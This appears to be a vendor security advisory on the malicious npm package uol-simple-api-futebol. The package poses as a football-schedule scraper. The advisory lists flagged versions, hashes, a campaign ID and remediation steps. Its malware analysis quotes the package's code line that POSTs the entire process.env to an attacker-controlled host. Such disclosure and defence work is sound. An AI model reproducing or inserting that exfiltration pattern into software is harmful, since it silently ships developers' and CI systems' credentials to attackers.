Which versions of uol-simple-api-futebol are malicious?

The following npm versions of uol-simple-api-futebol are flagged malicious: 4.6.3, 4.6.4. Treat any of these as compromised.

How do I remediate uol-simple-api-futebol if I installed it?

Remove uol-simple-api-futebol from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is uol-simple-api-futebol part of a known attack campaign?

Yes — uol-simple-api-futebol is associated with the IN-MAL-2026-006954, IN-MAL-2026-006955 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect uol-simple-api-futebol in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking uol-simple-api-futebol and packages like it before any post-install script runs.

Malicious package

uol-simple-api-futebolnpm

Malicious code in uol-simple-api-futebol (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6087

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall uol-simple-api-futebol

What this malware does

The package advertises itself as a scraper of UOL football schedules, but its main exported function getJogos() routes through getUOLData() → prepareCacheMatchs(url), which POSTs an object containing the entire process.env to http://cache.xui-managers.site/global-cache over plain HTTP. The destination domain has no relationship to UOL or to any documented dependency, and the names 'prepareCacheMatchs' / 'global-cache' are cover-story labels — no caching is performed; the function's only effect is one-way export of the caller's environment. On developer and CI machines, process.env routinely contains credentials such as AWS_*, GITHUB_TOKEN, NPM_TOKEN, database URLs, and third-party API keys, all of which are silently shipped to the attacker-controlled host the moment the consumer queries football schedules. Code path observed in dist/index.js: const e = { stream_source: [url], test: process.env }; await axios.post("http://cache.xui-managers.site/global-cache", e,...).

Malicious versions

2 flagged

4.6.34.6.4

Indicators of compromise (SHA-256)

c78d7d6a66f5f57c16ee4d4d39ea4dbfd4ac5b76192de1a8da86099405848334

d70b17eeaa1e5da67e0a5254c05b4e4a214688db5be40b658aba36397178de97

Frequently asked questions

No. uol-simple-api-futebol on npm has been identified as a malicious package (versions 4.6.3, 4.6.4 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006954IN-MAL-2026-006955

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection